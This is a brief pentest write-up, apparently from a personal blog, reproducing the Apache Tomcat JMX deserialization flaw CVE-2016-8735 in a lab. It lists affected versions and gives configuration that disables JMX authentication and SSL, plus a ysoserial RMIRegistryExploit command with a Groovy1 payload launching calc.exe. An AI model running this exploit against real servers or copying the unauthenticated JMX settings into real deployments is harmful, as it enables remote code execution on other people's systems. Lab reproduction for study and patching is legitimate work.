xl7dev

Apache Tomcat Remote Code Execution(CVE-2016-8735)

0x01 Affected Platform

1
2
3
4
5
6
Apache Tomcat 9.0.0.M1 to 9.0.0.M11
Apache Tomcat 8.5.0 to 8.5.6
Apache Tomcat 8.0.0.RC1 to 8.0.38
Apache Tomcat 7.0.0 to 7.0.72
Apache Tomcat 6.0.0 to 6.0.47
Earlier, unsupported versions may also be affected

0x02 Test Platform

1
2
3
4
5
Window2003 x86
[POC](https://github.com/frohoff/ysoserial)
[Apache Tomcat](http://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/apache-tomcat-8.0.36-windows-x86.zip)
[catalina-jmx-remote](http://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/extras/catalina-jmx-remote.jar) //add to tomcat/lib/
[Groovy](https://repo1.maven.org/maven2/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar) //add to tomcat/lib/

0x03 Pentesting Step

1. add code to tomcat/bin/catalina.bat

1
2
3
@echo off
set "JAVA_OPTS=-Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false"
rem Licensed to the Apache Software Foundation (ASF) under one or more

2. add code to tomcat/conf/server.xml

1
2
3
4
5
6
7
8
<Listener className="org.apache.catalina.mbeans.GlobalResourcesLifecycleListener" />
<Listener className="org.apache.catalina.core.ThreadLocalLeakPreventionListener" />

<Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener" rmiRegistryPortPlatform="10001" rmiServerPortPlatform="10002" />

<!-- Global JNDI resources
Documentation at /docs/jndi-resources-howto.html
-->

3. Start tomcat/bin/startup.bat

4. run

1
2
C:\Documents and Settings\Administrator> java -cp ysoserial.jar ysoserial.exploi
t.RMIRegistryExploit localhost 10001 Groovy1 "calc.exe"

0x04 Referer

http://seclists.org/oss-sec/2016/q4/502